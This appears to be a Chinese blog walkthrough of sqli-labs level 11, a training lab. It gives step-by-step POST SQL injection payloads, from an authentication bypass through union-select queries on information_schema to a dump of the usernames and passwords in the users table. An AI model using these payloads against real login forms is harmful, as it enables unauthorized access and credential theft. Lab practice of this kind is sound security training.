当前位置: 首页 > news >正文

sqli-labs第十一关——‘POST联合查询

这一关用hackbar来判断

一:判断注入类型

通过查看页面源代码我们知道两个输入框名分别是uname和passwd

uname=1&passwd=
uname=1'&passwd=
uanme=1"&passwd=

观察页面,只有单引号闭合的产生报错回显 

判断闭合类型为单引号字符型;

uname=1' or '1'='1'#&passwd=1234

 布尔验证一下

 成功登录,闭合类型是单引号字符型

二:开始注入 

1.判断列数

uname=1' order by 2#&passwd=1234

只有两列,数到第三列的时候报错

2.爆数据库名

uname=1' union select 1,database()#&passwd=1234

3.爆所有的表名

uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1234

4.爆所有的列名

uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'#&passwd=1234

 5.爆数据

uname=1' union select 1,group_concat(username,0x3a,password) from users#&passwd=1234

❀❀❀ 完结撒花!! ❀❀❀ 

相关文章:

  • 【Bluedroid】蓝牙HID Device virtual_cable_unplug全流程源码解析
  • deepseek梳理java高级开发工程师es面试题
  • 【SFT监督微调总结】大模型SFT全解析:从原理到工具链,解锁AI微调的核心密码
  • 通过改进模型减少过拟合现象的技术文档
  • [luogu12543] [APIO2025] 转杆 - 构造 - 贪心
  • 面试之MySQL慢查询优化干货分享
  • Vue video播放视频流
  • 数据实时同步:inotify + rsync 实现数据实时同步
  • 网络安全之带正常数字签名的后门样本分析
  • 设计模式 - 工厂模式
  • Linux:库与链接
  • PostGIS栅格数据类型解析【raster】
  • 通过 API 获取 1688 平台店铺所有商品信息的完整流程
  • 查看mysql配置文件my.cnf的位置
  • 小土堆pytorch--神经网路-卷积层池化层
  • C++中String类
  • JavaScript的Button的contentItem属性
  • 销售易史彦泽:从效率工具到增长引擎,AI加速CRM不断进化
  • 家电行业数字化实践案例 | 易趋携手某知名家电集团打造数字化项目管理系统
  • msq基础
  • 董明珠孟羽童官宣,5月23日将合体直播
  • 人猴“攻防战”:难守的庄稼与扩张的猴群,部分村民选择放牧搬家
  • 重庆对外经贸学院通报:一学生在体育课后不慎坠入化粪池,不幸遇难
  • 上海肺科医院院长陈昶:临床中的痛点,正是新技术诞生的起点
  • A股午后回暖,三大股指涨跌互现:港口板块重新走强,两市成交近1.1万亿元
  • 王毅同丹麦外交大臣拉斯穆森会谈